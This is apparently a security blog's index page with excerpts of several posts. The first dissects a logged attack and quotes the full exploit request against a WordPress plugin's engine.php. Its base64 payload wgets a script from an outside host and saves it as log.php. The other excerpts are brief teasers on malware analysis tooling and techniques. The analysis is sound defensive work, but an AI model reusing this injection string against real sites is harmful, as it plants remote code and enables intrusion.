Automated or manual attack?
Today I received a notification about an automated attack against this blog. Nothing new, however, I was curious about how it exactly works and decided to take a brief look to the attack to answer various questions:
- What vulnerability is this exploiting? Am I vulnerable?
- What does the payload?
- Is this an automated attack or a manually launched one?
The attack in the logs
Since I installed mute screamer plugin for WordPress I receive regularly attack alerts (mainly about spamming). The one I received today was a bit different. In the generated log file the following line appears:
/blog/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3d3dy5zY2sub2JlY3ZyYm92LnNrL3dwLWNvbnRlbnQvdXBsb2Fkcy9mZ2FsbGVyeS9zaC50eHQ7IG12IHNoLnR4dCBsb2cucGhwJyk7));
So, this is an exploit for a PHP code injection vulnerability in "engine.php". A quick search of the vulnerability revealed this: WordPress is_human() Plugin Remote Command Injection Vulnerability. Fortunately, I don't have this plugin installed so I already answered the first 2 questions. Time to answer the next one: what the payload does?
Zerowine 2.0 preview
Hi!
I plan to release in a month or so the newest version of ZeroWine focused on automation. This new version consists in the following components:
- A modified version of Wine 1.10.
- One XMLRPC Server.
- One XMLRPC client tool.
Dangers of Oracle Virtual Columns
Virtual Columns is a new feature of Oracle 11g. This feature allows to create table columns based on PL/SQL functions. While it's useful it can be dangerous too.
MyNav, a python plugin for IDA Pro
MyNav is an Open Source IDAPython plugin for the commercial disassembler IDA Pro to be released on July 2010. The plugin adds a lot of new features only available in other products like in the well known Zynamics BinNavi or HB Gary's Inspector. In this blog post I will show you some of the features available in the current version with some examples.
Antiemulation Techniques (Malware Tricks II)
From time to time, when reversing malware, I find new antiemulation techniques as they are widely used by malware to evade detection by AVs that uses emulation, however, it seems that no one wrote about them maybe because there are a lot or, maybe, because they aren't very interesting. Anyway, a friend and I decided to look for antiemulation techniques and we found a bunch of them in just about 2 days. Surprise. Well, the following is a list of antiemulation techniques "found" by us.